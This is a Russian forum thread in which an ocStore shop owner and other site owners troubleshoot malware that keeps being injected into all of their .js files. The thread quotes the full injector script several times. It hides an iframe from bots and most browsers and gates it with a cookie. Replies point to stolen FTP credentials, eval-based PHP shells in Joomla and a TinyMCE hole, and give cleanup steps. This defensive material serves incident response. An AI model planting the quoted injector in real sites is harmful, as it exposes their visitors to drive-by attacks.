Перейти к содержанию
colaweb

[Решено? {joomla}] Взлом магазина *.js

Рекомендуемые сообщения

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

На другой cms была такая проблема - во ВСЕ js-файлы (в самый конец) добавлялся, скажем так, некий код (не обязательно как у вас). Выяснилось: дыра FTP (а потому не храните пароли в клиентах). Лечение: либо чистка всех js-файлов, либо их замена + ОБЯЗАТЕЛЬНАЯ смена FTP-доступов (логин - пароль).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:


Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

на вашем аккаунте случайно нет сайтов на джумле или дле?  Если есть, то ищите дыры там

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Как оказалось, вредоносный код во всех файлах *.js не только в ocStore, но и в других cms.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 

на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там

Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал.

 я бы мог конечно назвать и другие CMS , но боюсь , что не хватит места на форуме.. просто привел пример.. :-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Так ведь дело-то не в cms, а в способе и пути проникновения вредоносного кода, ну и "чистоте" своего компьютера, конечно же  :wink:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

1. Почистил все файлы *.js

2. Поменял все пароли

 

"Дырку" та и не нашел, посмотрю что завтра будет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

1. Почистил все файлы *.js

2. Поменял все пароли

 

"Дырку" та и не нашел, посмотрю что завтра будет.

 

Не помогло. Опять во все *.js дописался вначале вредоносный код 

 

В файле ошибок появились записи:

2013-10-14 20:18:51 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:18:51 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:18:51 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106
2013-10-14 20:44:55 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:44:55 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:44:55 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106
2013-10-14 20:50:12 - PHP Warning:  fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99
2013-10-14 20:50:12 - PHP Warning:  fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103
2013-10-14 20:50:12 - PHP Warning:  sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106

Что делать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке?

в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817
Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой:

 

<Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$">

Deny from all

</Files>

Order allow,deny

Deny from all

 

Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем

Изменено пользователем afwollis
unlinked

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина.

 

Шеллы сидели в Joomle.

 

Почистил все файлы .php где был код с 

eval(..

Пока все тихо, ищу "дырку"

.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Шеллы сидели в Joomle.

 

Почистил все файлы .php где был код с 

eval(..

Пока все тихо, ищу "дырку"

.

вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тоже попалась эта зараза. Действовал так:

  • удалил вредоносный код из всех .js
  • в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php
  • поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla
  • удалил все найденные php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Идей много, вплоть до анализа логов доступа.

Вам нужно лечить? или заниматься самолечением?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/

 

вот этот код:

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут.

 

магазин http://colaweb.ru/honey/

 

Может это поможет? Вирусдай (писал обзор тут).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.